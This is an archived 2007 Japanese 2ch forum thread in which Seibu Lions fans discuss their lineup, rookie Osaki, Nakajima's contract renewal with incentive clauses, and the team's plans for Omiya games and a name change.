2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

背番号も打順も三番です@西武スレ'07-3

1 :代打名無し@実況は実況板で:2007/01/17(水) 21:34:38 ID:HX+fU9fl0
目指せ野球界のディープインパクト@西武スレ’07-2
http://ex13.2ch.net/test/read.cgi/base/1168546600/

      ∧ ∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜′ ̄ ̄(´ー`)< このスレは通算西武スレpart600だよ〜
 UU ̄ ̄ U U  \______________

荒らし・煽り・ageレスにはレス禁止、放置が1番。2番は片岡。
「よそはよそ。うちは投壊(とうかい)」本スレはもちろん自治スレでも徹底放置!
わかってても気になるよ!って人はツールの使用をオススメします。 NGワード機能を使おう!
ツール類はここで落とせるよ→ http://www.monazilla.org/
詳しい使用法については、自治@西武スレ、プロ野球板自治スレなどで質問してください。
荒らし防止の為sage進行遵守・基本的にコテハン無しでお願いします。
他球団を罵倒したり他球団スレに出張して挑発するなど、他人に不快となる行為はやめましょう。
あだ名・顔文字等はこちらまで→ http://www.geocities.co.jp/Athlete-Olympia/5794/
関連スレ以外でのあだ名・顔文字の使用は控えましょう。スレの現状に不満がある方は自治スレにてどうぞ。
自治スレに書き込むことを拒むヤシは(・∀・)カエレ!!
※ はじめての方は御一読ください。(自治@西武スレ #7.5)
http://jbbs.livedoor.jp/bbs/read.cgi/sports/19056/1142217571/

次スレは>>900を踏んだ人が立てること。
立てられない人は踏まないでください。踏み逃げ厳禁
スレタイは常時↓にて受付中
http://jbbs.livedoor.jp/bbs/read.cgi/sports/19056/1151839217/l10
スレタイに関する議論はこっちで↓
http://jbbs.livedoor.jp/bbs/read.cgi/sports/19056/1101010141/

2 :代打名無し@実況は実況板で:2007/01/17(水) 21:35:38 ID:HX+fU9fl0
関連ページ
西武ライオンズオフィシャルサイト
http://www.seibu-group.co.jp/lions/
インボイス☆エクスプレス(インボイス情報)
http://www.invoice.ne.jp/cgi-bin/seibu/invoice.cgi
Yahooスポーツ(日程とか成績とか色々)
http://baseball.yahoo.co.jp/npb/teams/7/
パシフィック野球連盟公式サイト
http://www.pacific.npb.or.jp/index.html
東尾コム (ネタの宝庫)
http://www.higashio.com/
松井稼頭央公式ページ
http://sports.nifty.com/kazuo25/
文化放送ライオンズナイター(プレイバック・ライオンズとか色々)
http://www.lionsnighter.com/
伊東勤監督 レオ的!常勝伊東塾
http://lionsnighter.com/itoh/
赤田将吾オフィシャルサイト「侍魂」
http://www.samurai-shogo9.com/
小野寺力 オフィシャルサイト
http://www.chikara-o.net/
中川充四郎ドットコム
http://www.jushiro.com/
麻子のブログ
http://blog.goo.ne.jp/asays1651
過去ログ(にくちゃんねる)
http://makimo.to/cgi-bin/search/search.cgi?&q=%90%BC%95%90%83X%83%8C&all=on&view=table
西武実況掲示板
http://sironeko3.s28.xrea.com/jikkyou

3 :代打名無し@実況は実況板で:2007/01/17(水) 21:35:41 ID:8xCx09REO
性豚

4 :代打名無し@実況は実況板で:2007/01/17(水) 21:36:04 ID:FvxNIHEs0
西武、大宮で開催の意向 球団名も含め地域密着に

西武の太田秀和オーナー代行は17日、埼玉県庁に上田清司知事を訪ね、
2008年にも、さいたま市の大宮公園野球場で1軍の公式戦を開催したい意向を伝えた。
同代行は「ことしは埼玉県の球団ということをアピールしたい」と狙いを語った。

さらに、08年シーズンに向けて球団名に「埼玉」など地域名を加えることを
検討する方針も明らかにし、地域密着の姿勢をより鮮明にする考えを示した。

一方、上田知事は「歓迎です」と話し、試合開催に向け大宮の球場に改修の必要が
生じる場合にも「(費用などが)そんなに難しい話でなければ」と柔軟な姿勢を示した。

西武は埼玉県が保護地域だが、球団によると県内で所沢市にある
本拠地球場以外で1軍の公式戦を開催したことがない。

http://sportsnavi.yahoo.co.jp/baseball/npb/headlines/20070117-00000047-kyodo_sp-spo.html

5 :代打名無し@実況は実況板で:2007/01/17(水) 21:36:28 ID:HX+fU9fl0
関連スレ
伊東勤監督とともに苦難を乗り越えてゆくスレ34
http://ex13.2ch.net/test/read.cgi/base/1164012985/
【ace】西口文也☆西武ライオンズ【13】part29
http://ex13.2ch.net/test/read.cgi/base/1162888998/
涌井秀章応援スレ【西武】Part1
http://ex13.2ch.net/test/read.cgi/base/1154515663/
【西武】中島裕之の今日もやったるで!13【三番】
http://ex13.2ch.net/test/read.cgi/base/1162645290/
【西武】片岡易之応援スレ2【攻・守・走】
http://ex13.2ch.net/test/read.cgi/base/1157433172/
【西武ライオンズ】カブレラのスレ【第7号本塁打】
http://ex13.2ch.net/test/read.cgi/base/1159599204/
【西武】韋駄天・福地を語るスレッド3
http://ex13.2ch.net/test/read.cgi/base/1158420067/
細川・野田アワレwwwwwwwwwww
http://ex13.2ch.net/test/read.cgi/base/1163692748/
【和製】GG佐藤【カブレラ】
http://sports9.2ch.net/test/read.cgi/muscle/1098434060/
【23】西武ライオンズの和田は凄いぞver.4【23】
http://life7.2ch.net/test/read.cgi/hage/1118585957/
07パ・リーグ限定各球団の戦力分析スレ Part11
http://ex13.2ch.net/test/read.cgi/base/1166966495/
■'07年のビリは楽天だろ、普通に考えて■
http://ex13.2ch.net/test/read.cgi/base/1163038557/
£2007年西武専用ドラフトスレ1
http://ex13.2ch.net/test/read.cgi/base/1164590351/

6 :代打名無し@実況は実況板で:2007/01/17(水) 21:36:47 ID:T9K/YJZO0
性豚

7 :代打名無し@実況は実況板で:2007/01/17(水) 21:42:50 ID:GxMIZdfQ0
>>1
3番中島背番号3トリプルスリー乙

ついでに中島最新情報(多村ブログより)
ttp://6tools.jp/blog/entries/242.html

8 :代打名無し@実況は実況板で:2007/01/17(水) 22:08:32 ID:JSeGEL240
水田スイッチになるらしいな。

9 :代打名無し@実況は実況板で:2007/01/17(水) 22:11:28 ID:gvdZGfAY0
どうせ打てないんだから、可能性のあることは何でも試してみるとエエ

10 :代打名無し@実況は実況板で:2007/01/17(水) 22:12:21 ID:2PTXbLMi0
ナカジ3塁にコンバートされるの?
今のままショートで育てた方がいいと思うのだが。

11 :代打名無し@実況は実況板で:2007/01/17(水) 22:14:22 ID:JSeGEL240
中島は結局ショートだよ。三塁コンバートという話もあったが、かわりにショートのレギュラーはれる人材がいないしな。

12 :代打名無し@実況は実況板で:2007/01/17(水) 22:15:13 ID:DRTbrMZq0
大宮で年5試合くらいやってくれるといいなぁ

13 :代打名無し@実況は実況板で:2007/01/17(水) 22:15:49 ID:4le3vUFkO
正直、上達したとはいえまだ酷いからなナカジの守備。
原が使えるようなら早めにコンバートしたほうがいいだろう。
ショートであれだけ打てるのは勿体ないが。

14 :代打名無し@実況は実況板で:2007/01/17(水) 22:19:41 ID:GxMIZdfQ0
サードはおかわりと平尾と石井義で争わせたらいい

15 :代打名無し@実況は実況板で:2007/01/17(水) 22:22:19 ID:vhM4bTNS0
中 赤田
二 片岡
左 栗山
右 中島
三 中村
指 義人
捕 炭谷
一 和田
遊 原

16 :代打名無し@実況は実況板で:2007/01/17(水) 22:22:56 ID:7xQJ5kRs0
監督はナカジは基本はショートでコンバートという形で固定はしないけど
試合の終盤になって、代打攻勢をしたりしたときに
サード中島という起用をしていきたいと1ヶ月前のTBSラジオで言ってた。
これからのナカジにとっても幅が広がって悪いことではないからできればやるってさ。

17 :代打名無し@実況は実況板で:2007/01/17(水) 22:23:33 ID:4VE81kHZ0
少なくとも原や他の選手がある程度力を見せてくれないと、
中島コンバートなんてありえないでしょ。


18 :代打名無し@実況は実況板で:2007/01/17(水) 22:24:19 ID:katc+47e0
>>8
赤田に福地に水田か<スイッチ
石橋もスイッチだっけ。これでデストラーデ級の外国人入れたらすごいスイッチャブル
打線が組めるな。ハムを辞めたあの人とか・・・。

19 :代打名無し@実況は実況板で:2007/01/17(水) 22:25:39 ID:JSeGEL240
原は新人でどの程度できるかわからんし、水田・黒田は打てない。
あとは片岡だが、ショート守らせるとスペるから×。
テスト入団の石橋もショート守れるが過度の期待はしない方がいい。
こうしてみると数はいるんだがショートのレギュラーはれる選手は中島しかいないな。

20 :代打名無し@実況は実況板で:2007/01/17(水) 22:31:04 ID:GxMIZdfQ0
>>17
同意
誰かが「中島をショートからコンバートさせたくなるくらいの選手」にならないと非現実的な話

21 :代打名無し@実況は実況板で:2007/01/17(水) 22:32:16 ID:XN2hGosO0
1 右 福地 大崎 大島
2 二 片岡 高木
3 遊 中島 原、水田
4 一 カブレラ 江藤
5 左 和田 GG
6 DH 栗山 リーファー
7 三 中村 石井義
8 捕 細川 炭谷
9 中 赤田 柴田 松坂

西口ー松永ーJJ−涌井ー帆足ー岸 山崎、ギッセル、宮越、グラマン、河原

三井、山岸、星野、山本淳、岩崎、西川、山本歩

小野寺、おーぬま

22 :代打名無し@実況は実況板で:2007/01/17(水) 22:33:50 ID:LiShnnMF0
本スレは重複です。(前スレから重複)

速やかに移行してください。

心を、ひとつに。ノリは、西武に。@西武スレ’07-2
http://ex13.2ch.net/test/read.cgi/base/1168532360/



23 :代打名無し@実況は実況板で:2007/01/17(水) 22:34:05 ID:qoFAg9A20
>>21
最下段右に力の限り反対

24 :代打名無し@実況は実況板で:2007/01/17(水) 22:34:20 ID:GxMIZdfQ0
ID:LiShnnMF0


25 :代打名無し@実況は実況板で:2007/01/17(水) 22:41:39 ID:DRTbrMZq0
18福地
26中島
39栗山
43カブ
57和田
6D石井
75中村
82細川
94片岡

栗山の守備がよくなればこんな打線面白そう

26 :代打名無し@実況は実況板で:2007/01/17(水) 22:45:39 ID:RIwug4OL0
守備の前に打撃だろ

27 :代打名無し@実況は実況板で:2007/01/17(水) 22:50:37 ID:7xQJ5kRs0
カリ更新

28 :代打名無し@実況は実況板で:2007/01/17(水) 23:01:25 ID:iGusq/rz0
原が.280打ってくれるから問題なし。
浩之二世。

29 :代打名無し@実況は実況板で:2007/01/17(水) 23:05:34 ID:4VE81kHZ0
現実的に考えれば、野手は今年は殆ど去年と変わらない顔ぶれだろうね。
捕手 細川・炭谷
内野 カブレラ・片岡・中島・義人・中村
外野 福地・赤田・和田・栗山
の11人は確定だろうし、
浩之・江藤・平尾あたりもかなりの確率で確定だろう。
残りもGG、佐藤、リーファー、高山もいるし、大崎や原も1軍を勝ち取るのはかなり厳しそうだな。
そういえば福地は今期から登録も外野になるのかな?


30 :代打名無し@実況は実況板で:2007/01/17(水) 23:10:40 ID:Q4T73KkH0
そろそろリンク切れまくりの関連スレもなんとかしようね。

31 :代打名無し@実況は実況板で:2007/01/17(水) 23:14:19 ID:5SsBOA870
大崎の守備を見るととてもじゃないが福地安泰とは言い難いw

32 :代打名無し@実況は実況板で:2007/01/17(水) 23:15:37 ID:GxMIZdfQ0
>>29
福地を今さら外野手以外で使うとは思えないし

33 :代打名無し@実況は実況板で:2007/01/17(水) 23:23:35 ID:XN2hGosO0
>>31
大崎そんなに凄いの?

あと宮越何で去年駄目だったんだろう

34 :代打名無し@実況は実況板で:2007/01/17(水) 23:42:24 ID:gvdZGfAY0
一昨年の宮越と山岸は、来年はこれで先発が二枚できたと思ったもんだったが

35 :代打名無し@実況は実況板で:2007/01/17(水) 23:45:19 ID:Ud8osWpUO
TBSで競輪キタ
銀ちゃんかっこいいよ銀ちゃん

36 :代打名無し@実況は実況板で:2007/01/17(水) 23:48:41 ID:4VE81kHZ0
コントロールが悪かった。
一昨年はコントロールあんまりよくないと聞いていたのに
意外にコントロールが良く低めに丁寧に集めて、球速の割りに空振りの取れるストレートで勝負できてた。
去年はコントロールが悪く、要所で高めに浮いて痛打されたのをよく見た。
球威のあるタイプじゃないし、タマが浮いてるとあんまり抑えられなかった。


37 :代打名無し@実況は実況板で:2007/01/17(水) 23:51:31 ID:yPYOk3ou0
大崎は凄いよ、身のこなしが違う
四年次に落ち込まなかったら3巡で争奪戦だったろう
よく6巡で獲得できたもんだ

38 :代打名無し@実況は実況板で:2007/01/17(水) 23:58:49 ID:4le3vUFkO
銀ちゃんカコイイ

39 :代打名無し@実況は実況板で:2007/01/17(水) 23:59:58 ID:u+hVZwzDO
競輪タイムトライアル銀仁朗のタイム速すぎだろw

40 :代打名無し@実況は実況板で:2007/01/18(木) 00:07:01 ID:9dXMkt6B0
http://sportsnavi.yahoo.co.jp/baseball/npb/headlines/20070117-00000037-kyodo_sp-spo.html

ヤクルトは名前で取ってるのか?ガトームソンといい変わった名前の投手好きだな。

しかし、JJより活躍しそうな気がするのは、ネガだから?

41 :代打名無し@実況は実況板で:2007/01/18(木) 00:11:18 ID:hfq8xJJX0
大崎外野で使って和田DHでいいやん

42 :代打名無し@実況は実況板で:2007/01/18(木) 00:12:39 ID:X0RE7nAQ0
JJは医薬品メーカーみたいな名前だな

43 :代打名無し@実況は実況板で:2007/01/18(木) 00:13:49 ID:SxuAec5/0
>>41
贅沢だなーw
タラバガニ丸ごと使って味噌汁のダシを取るぐらいに贅沢

44 :代打名無し@実況は実況板で:2007/01/18(木) 00:17:03 ID:8GkjnXSy0
壮行会っていつだろ?

45 :代打名無し@実況は実況板で:2007/01/18(木) 00:24:29 ID:dSX7yLTn0
大崎をやたら評価している香具師がいるがぶっちゃけこの時期の出来はあてにならないよ。
大崎は早めに体を作っていたというだけの話。

46 :代打名無し@実況は実況板で:2007/01/18(木) 00:32:34 ID:UCQ59AYn0
まあ大崎が3年までの成績ならあの順位での獲得は無理なのは確実だろうな

47 :代打名無し@実況は実況板で:2007/01/18(木) 00:33:49 ID:uUJPxy2u0
俺はみてないから知らないけど、
評価してる人達は現時点での大崎の動きと
うちの1軍の選手のレギュラーシーズンの動きを
比較してるんじゃないの?
だったら早めに体を作ったもくそもないだろう

48 :代打名無し@実況は実況板で:2007/01/18(木) 00:58:58 ID:/zt9wm2a0
1年からレギュラーだけど大崎のリーグ戦の成績自体はそこまでじゃないんだけどね。
1年春 0.231 2本 8打点 1盗塁(28位)
1年秋 0.257 1本 3打点 2盗塁(20位)
2年春 0.373 1本 10打点 1盗塁(4位)
2年秋 0.306 0本 2打点 3盗塁(5位)
3年春 0.314 2本 5打点 1盗塁(12位)
3年秋 0.286 0本 6打点 3盗塁(27位・ベストナイン?)
4年春 0.271 3本 6打点 3盗塁
4年秋 0.229 1本 1打点 6盗塁 
まあ大学選手権では4試合で0.647で首位打者になったりはしてるけど・・・


49 :代打名無し@実況は実況板で:2007/01/18(木) 01:04:03 ID:l6neZ7Nh0
2,3年次成績が良くて、4年でがたっと落とした選手といえばゴトタケが思い浮かぶな

50 :代打名無し@実況は実況板で:2007/01/18(木) 01:15:32 ID:bNT3gKBE0
開幕前に急いで取ってきたライト以外の外人は最近活躍してるし
金もかけてるわけだからJJは活躍しないわけがないと思うのだが
どうしても高年俸投手って良いイメージないんだよなぁ

51 :代打名無し@実況は実況板で:2007/01/18(木) 01:17:10 ID:bNT3gKBE0
投手に限らず野手もだ

52 :代打名無し@実況は実況板で:2007/01/18(木) 01:48:50 ID:PF5rLX4L0
大崎は代走・守備要員で行けばいいよ。ちょうど高波クビにしちゃったし、ちょうどいい

53 :代打名無し@実況は実況板で:2007/01/18(木) 01:51:42 ID:BhGEvb0Q0
福地だっていつまで活躍するかわからないし、福地の後釜に座ってくれれば万々歳。

54 :代打名無し@実況は実況板で:2007/01/18(木) 02:37:27 ID:rIW6+9lx0
やっぱ常総出身者の守備は中々だな 坂といい金子といい大崎といい
常総ふぁんで西武ふぁんでもある俺からしたら嬉しいよ

55 :代打名無し@実況は実況板で:2007/01/18(木) 04:23:40 ID:9KmyFJO00
>>48
数年打撃磨かなきゃレギュラーは遠そうだな

56 :代打名無し@実況は実況板で:2007/01/18(木) 04:48:04 ID:3cPqIuV+O
>>55
そこで田辺道場ですよ

大崎って肩はどんな感じなんだろ?
あまり強いとはいえない感じなんだっけ?

57 :代打名無し@実況は実況板で:2007/01/18(木) 06:06:41 ID:4V8kOWeyO
おい、おまいら!
今年のクリリンはトリプル3達成するって彼女が言ってたから安心汁!

58 :代打名無し@実況は実況板で:2007/01/18(木) 06:08:28 ID:fHuSD2CrO
>>56
肩は大学では並レベルでしたな
プロでは弱い部類だと思う

59 :代打名無し@実況は実況板で:2007/01/18(木) 07:53:44 ID:+g/TPxYv0
西武ライオンズ改め埼玉ライオンズ…「県の球団アピール」来季変更へ
http://hochi.yomiuri.co.jp/baseball/npb/news/20070118-OHT1T00066.htm

60 :代打名無し@実況は実況板で:2007/01/18(木) 08:14:32 ID:uBihr8Kn0
まーそれはゴトタケが2年次のままだったら、自由枠での争奪戦になったんだろうなって話だ。

61 :代打名無し@実況は実況板で:2007/01/18(木) 08:19:24 ID:STFfRfdQ0
ピークが3年次ならまだしも、2年次だからな。
2年の時がピークで、4年次成績落としてプロ入りして活躍した選手って
具体的に誰?

62 :代打名無し@実況は実況板で:2007/01/18(木) 08:27:15 ID:sICjPyuF0
西武、大宮で開催の意向 球団名も含め地域密着に
http://www.nishinippon.co.jp/nsp/sports/sports_all/20070117/20070117_037.shtml


63 :代打名無し@実況は実況板で:2007/01/18(木) 08:28:20 ID:ZlorAN1b0
>>58
競争相手が福地だから特に問題にはならないな

64 :代打名無し@実況は実況板で:2007/01/18(木) 08:35:16 ID:UCQ59AYn0
>>58
大崎は肩弱いかな?特別強くはないけど赤田や福地ほど弱いってわけでもないよ

65 :代打名無し@実況は実況板で:2007/01/18(木) 08:49:47 ID:/QqJ+orx0
栗と天才が入ってくりゃ、良い打線になるね
良い守備陣かどうかは別として

66 :代打名無し@実況は実況板で:2007/01/18(木) 08:54:41 ID:4V8kOWeyO
マジでクリリンはやるよ
骨折しながらの満塁弾、東京ドームでの看板直撃弾は鳥肌もの
将来はまじでフクドメクラスになる
まちがいないよ俺のばあちゃんが言ってた

67 :代打名無し@実況は実況板で:2007/01/18(木) 08:59:01 ID:W07cM9i60
ノリもロッテに行きそうだし良かったな

68 :代打名無し@実況は実況板で:2007/01/18(木) 09:19:27 ID:ibDcTCuP0
栗の打撃センスの良さは確かにすごいが、守備の悪さもすごいからな。
せめて1塁が守れたら、株の後釜候補になるんだけど。

69 :代打名無し@実況は実況板で:2007/01/18(木) 09:24:35 ID:mCPcjdwF0
でも守備は着実に上達してると思うけど。ライナー性の打球も問題なく捕球できるようになってきたし。

70 :代打名無し@実況は実況板で:2007/01/18(木) 09:29:10 ID:+g/TPxYv0
そいつぁ素晴らしい。偉大な進歩だね

71 :代打名無し@実況は実況板で:2007/01/18(木) 09:33:39 ID:mCPcjdwF0
まあそんだけ酷かったってことだよw

72 :代打名無し@実況は実況板で:2007/01/18(木) 09:38:21 ID:tC//2dSe0
>>62
良かった。年に数試合だろうが大宮開催を続けて欲しいね。

73 :代打名無し@実況は実況板で:2007/01/18(木) 09:48:40 ID:ErjA8oqzO
大宮開催楽しみです

74 :代打名無し@実況は実況板で:2007/01/18(木) 10:29:54 ID:dDq2zS7sO
関西で西武のホームゲームを1試合だけやってくれ
ゼニカネの問題じゃない。手を挙げてくれる地域にはどこでも行きます。

早く本拠地移転してほしいなぁ

75 :代打名無し@実況は実況板で:2007/01/18(木) 11:49:06 ID:ytrwfAp40
西武蔵野ホワイトライオンズ

長いので西武ライオンズと呼んでくださいね

76 :代打名無し@実況は実況板で:2007/01/18(木) 12:03:01 ID:icjPQyFt0
恥ずかしいニュースだな
俺が15の時の初走行でも26秒ぐらいだわ
もちろん運動靴で
20秒はきらないと話にならん

77 :代打名無し@実況は実況板で:2007/01/18(木) 12:17:55 ID:Pj2+nXAy0
>>76
どこの誤爆だ?

78 :代打名無し@実況は実況板で:2007/01/18(木) 12:22:54 ID:wBiRRVqn0
大宮開催は青空の下で試合が見れて逆に良かったりして…

79 :代打名無し@実況は実況板で:2007/01/18(木) 12:34:13 ID:GpmuWNCR0
>>77
競輪のニュースの話じゃないのか

80 :代打名無し@実況は実況板で:2007/01/18(木) 12:38:55 ID:esojAXy/O
ひょっとして新人の競輪トレの話か?スレの流れを無視し過ぎだろw

81 :代打名無し@実況は実況板で:2007/01/18(木) 13:36:52 ID:6svdaIPE0
外野は激戦区だが、飛び抜けた選手もいない。
2,3年内に和田がDHに収まるとして
赤田は当分安泰。1番センター赤田。これ外野の要。
後の候補が
打撃型
栗山、高山、大島、貝塚、柴田
守備型
佐藤、大崎
バランス型
GG、松坂

万全とは言い難い。

82 :代打名無し@実況は実況板で:2007/01/18(木) 13:48:17 ID:9KmyFJO00
>>81
福地

83 :代打名無し@実況は実況板で:2007/01/18(木) 13:53:38 ID:6svdaIPE0
ああ、すっかり忘れてた・・・
福地はバランス型かな?
勝手な定義だが、打撃型から一人、守備、バランス型から一人が理想。
両翼が栗山と高山とかだったら赤田が死ぬからな。

84 :代打名無し@実況は実況板で:2007/01/18(木) 13:59:59 ID:+DltPS6zO
エリート佐藤がバランス型じゃないのは何故だい

85 :代打名無し@実況は実況板で:2007/01/18(木) 14:03:53 ID:+1qb7t100
〜型とかそんな定義すること自体が無駄

86 :代打名無し@実況は実況板で:2007/01/18(木) 14:30:14 ID:/zt9wm2a0
型に無理やり入れても意味が無いだろう。
バランスって意味では佐藤が一番取れてると思うけど
現状では外野手の4.5番手あたりだしね。
3割を大きく越す打率や30本塁打を打てる打撃ならちょっと話は変わるけど
打撃の良い選手でもある程度の守備力は必要なわけだしね。
それに打撃も1番を打つタイプや中軸を打つタイプの選手がいるんだしな。


87 :代打名無し@実況は実況板で:2007/01/18(木) 15:33:56 ID:P90OWQ+h0
>>59
埼玉(所沢)入れても西武は残すと思う。


88 :代打名無し@実況は実況板で:2007/01/18(木) 15:47:28 ID:c87ablzW0
>>61
広島の石原捕手は、その部類に入るかも。
4年次に伸び悩んでいたから、カープが一本釣りできたとか…。

89 :代打名無し@実況は実況板で:2007/01/18(木) 16:15:14 ID:dWhiff8t0
西武・中島、5度目でサイン…手厚い出来高に妥協

西武の中島が18日、5度目の契約更改交渉に臨み、2600万円増の
7000万円プラス出来高払いでサインした。西武は全選手が契約を終えた。
中島は年俸に上積みはなかったが、出来高を手厚くされて妥協したという。
今季に向けて既に本格始動しており「2年続けてけがをしたので、けがなく
全部出たい」とフル出場を誓った。(金額は推定)

ttp://www.sanspo.com/sokuho/0118sokuho039.html

90 :代打名無し@実況は実況板で:2007/01/18(木) 16:17:54 ID:SsDpMFSC0
三割30本打ったらどれくらい貰えるんだろ?

91 :代打名無し@実況は実況板で:2007/01/18(木) 16:21:04 ID:dWhiff8t0
>>90
それってナカジの話だよね?
それだったら、出来高抜きで1億円到達するでしょう・・・。
出来高も入れればそれ以上にも行く気がする。

92 :代打名無し@実況は実況板で:2007/01/18(木) 16:34:02 ID:/zt9wm2a0
元のベースの高い和田で2500万程度の出来高だし
最高で1500万程度じゃない?


93 :代打名無し@実況は実況板で:2007/01/18(木) 16:38:58 ID:W07cM9i60
>>89
「2年続けてけがをしたので」ってことが分かってるならごねるな

94 :代打名無し@実況は実況板で:2007/01/18(木) 16:50:36 ID:9KmyFJO00
結局出来高付いたんだから足元見てたのは球団だな

95 :代打名無し@実況は実況板で:2007/01/18(木) 17:15:01 ID:bNT3gKBE0
苦情来てる
http://ex13.2ch.net/test/read.cgi/base/1166081832/704-705

しかし荒らしスレでも重複扱いなのか?
〜最高やスレと大して変わらんと思うが…

96 :代打名無し@実況は実況板で:2007/01/18(木) 17:44:14 ID:Tg8EZbSM0
>>95
荒らしスレを立てる

重複スレだと粘着する

無視されると、依頼スレで言い散らし、依頼されても他の人が立てにくい空気を作る

マッチポンプ完成

普通の感性した人間なら「勃て!万国の労働者!@西武スレ 07-3」なんてスレ
使い切れとか言わんだろ。

97 :代打名無し@実況は実況板で:2007/01/18(木) 18:06:02 ID:DreX2Cok0
>>61
ゴトタケ自身、一年はなかなか良い成績残してるよ。

98 :代打名無し@実況は実況板で:2007/01/18(木) 18:12:57 ID:YCbQQu2p0
和田も中島も妥当な査定だと思うけどね
もうちょい上げてやれよと思ったのは三井くらい

99 :代打名無し@実況は実況板で:2007/01/18(木) 18:42:16 ID:VOVueYOO0
ナカジ更改おめでとう


出来高は5項目
満額で2000うpくらいいくらしい
そして球団初の

守備率による出来高査定導入

100 :代打名無し@実況は実況板で:2007/01/18(木) 18:50:43 ID:8Nmc23SUO
>>99
ID凄いな

101 :代打名無し@実況は実況板で:2007/01/18(木) 19:06:54 ID:Tg8EZbSM0
大崎のキャラ良かった。
平尾の後釜にぴったりだ。
平尾にいろいろ仕込んでもらえ。

102 :代打名無し@実況は実況板で:2007/01/18(木) 19:14:25 ID:UgUsOQvi0
最近細川の話題がとんとないな。27とったのに

103 :代打名無し@実況は実況板で:2007/01/18(木) 19:17:53 ID:UCQ59AYn0
http://sports.yahoo.co.jp/hl?c=sports&d=20070118&a=20070118-00000021-maip-spo

104 :代打名無し@実況は実況板で:2007/01/18(木) 19:46:49 ID:SxuAec5/0
今知った
来季から「さいたまライオンズ」ってマジか? 
ネタっぽくってorz

105 :代打名無し@実況は実況板で:2007/01/18(木) 19:48:17 ID:sZAr/npH0
ノリ豚は獲るなよ絶対に獲るなよ頼むから獲るなよ
フロント信じてるからな

106 :代打名無し@実況は実況板で:2007/01/18(木) 19:52:52 ID:5ZgDBY+A0
一難去ってまた一難

107 :代打名無し@実況は実況板で:2007/01/18(木) 19:58:36 ID:4V8kOWeyO
ところで開幕投手だれになるかな?
西口か涌井なんだろうけどね
西口きぼん

108 :代打名無し@実況は実況板で:2007/01/18(木) 19:59:00 ID:SxuAec5/0
ノリはトランプのババだからな
ノリ来るな

109 :代打名無し@実況は実況板で:2007/01/18(木) 19:59:48 ID:wSAsIvtaO
>>89
彡⌒ミ
(;´Д`) けがなく?

110 :代打名無し@実況は実況板で:2007/01/18(木) 20:05:14 ID:sjLEmVov0
>>108
使いようによってはjokerは一番強い札にもなる。なんて言ってみる。

111 :代打名無し@実況は実況板で:2007/01/18(木) 20:06:42 ID:sjLEmVov0
>>107
西口の予告先発だったが、発熱のため急遽大沼。
これがハマって、以後ローテの軸となったのであった(妄想)

112 :代打名無し@実況は実況板で:2007/01/18(木) 20:06:47 ID:SxuAec5/0
>>110
さむっ

113 :代打名無し@実況は実況板で:2007/01/18(木) 20:07:36 ID:sjLEmVov0
>>112
別に笑いとりに行ってないから。日本語勉強したら?

114 :代打名無し@実況は実況板で:2007/01/18(木) 20:08:20 ID:SxuAec5/0
>>113
はい

115 :代打名無し@実況は実況板で:2007/01/18(木) 20:14:03 ID:W07cM9i60
出来高契約って達成できなくともペナルティ無し?

116 :代打名無し@実況は実況板で:2007/01/18(木) 20:17:25 ID:Ta84paTh0
>>115
以前、ホークスが逆出来高とかいうのを提案したことがあったな。
通常は減額はないな。

117 :代打名無し@実況は実況板で:2007/01/18(木) 20:21:28 ID:VOVueYOO0
打ったぶんをエラーで相殺とかだったらおもろいのに>中島
まあ達成したらボーナス、て奴だろうけど

118 :代打名無し@実況は実況板で:2007/01/18(木) 20:32:34 ID:Ta84paTh0
>>117
それやったらゴトタケの給料は・・・

119 :代打名無し@実況は実況板で:2007/01/18(木) 20:37:29 ID:/zt9wm2a0
普通は無いだろうね。
5項目って事は守備率、試合数と打撃3部門かな。
0.970、140試合、0.300、20本、80打点
このあたりが満額のラインになるのかな?



120 :代打名無し@実況は実況板で:2007/01/18(木) 20:38:47 ID:rbwN8G1x0
打点1につき500万円、エラー1につき-2000万の完全出来高契約で。

121 :代打名無し@実況は実況板で:2007/01/18(木) 20:39:40 ID:5Zh7GM0rO
まぁ結果、中島のエラーが減ればいいし緊張感増すからいい出来高だね
ところで今日のQRの大崎、とても新人とは思えないようなテンションの高さだったなぁ〜

122 :代打名無し@実況は実況板で:2007/01/18(木) 20:47:18 ID:iCD07fm40
エラーがつかないように、無理をしない消極的なプレーになる予感

123 :代打名無し@実況は実況板で:2007/01/18(木) 21:00:11 ID:3cPqIuV+O
ここの住人的には
埼玉ライオンズ
所沢ライオンズ
武蔵野ライオンズ(これは候補にはないらしいが)
どれがいいと思う?

あと、企業名の西武をいれるかどうかとか

124 :代打名無し@実況は実況板で:2007/01/18(木) 21:01:38 ID:5Zh7GM0rO
>>122 だから、公式記録でエラーになっても明らかに記録がおかしい場合は球団査定ではエラーにしないっていうのが契約に盛り込まれているから心配ない

125 :代打名無し@実況は実況板で:2007/01/18(木) 21:05:55 ID:DhAoz1yxO
>>123埼玉西武ライオンズ。球場名を所沢グッドウィルドームに。

126 :代打名無し@実況は実況板で:2007/01/18(木) 21:06:09 ID:rbwN8G1x0
>>124
ソース

127 :代打名無し@実況は実況板で:2007/01/18(木) 21:15:19 ID:VOVueYOO0
>>126
QR

てか聞いてない奴おおいんだなと実感

128 :代打名無し@実況は実況板で:2007/01/18(木) 21:17:26 ID:rIW6+9lx0
>>123
所沢>埼玉>(越えられない壁)>武蔵野

といいたいところだが、埼玉のがいいのかもな
もち西武の名前は必須 

129 :代打名無し@実況は実況板で:2007/01/18(木) 21:18:57 ID:SxuAec5/0
>>123
いっそ一般公募で決めればいい

130 :代打名無し@実況は実況板で:2007/01/18(木) 21:19:27 ID:8ZGtHVtY0
彩の国ライオンズ

131 :代打名無し@実況は実況板で:2007/01/18(木) 21:27:03 ID:VOVueYOO0
ついでだからQRの残りの部分レポしとくか
<中島>
・トータル10時間くらい交渉したが「いい経験になってよかった」
・和田さんから「俺が押したからって押さなくてもいいんだぞ」と連絡を貰う
・来年は怪我なく
<大崎>
・アピールポイント→前向きな攻めのプレー
・小さい頃は柔道をやっていた
・打撃よりまずはバントなどの小技を練習していきたい
・高校大学とずっと寮生活でもう7年、プロは食事が豪華
・はきはきした受け答え、よく笑う(初インタビューでこれだけ笑ったルーキーは初めてじゃないかとのこと)
・小さい頃好きな球団は?→0.5秒の空白ののち「西武ライオンズです。あはははっ」
・誰が好きだったの?→0.5秒の空白ののち「秋山さんですね。あの側転バク転バク宙は素晴らしかった」
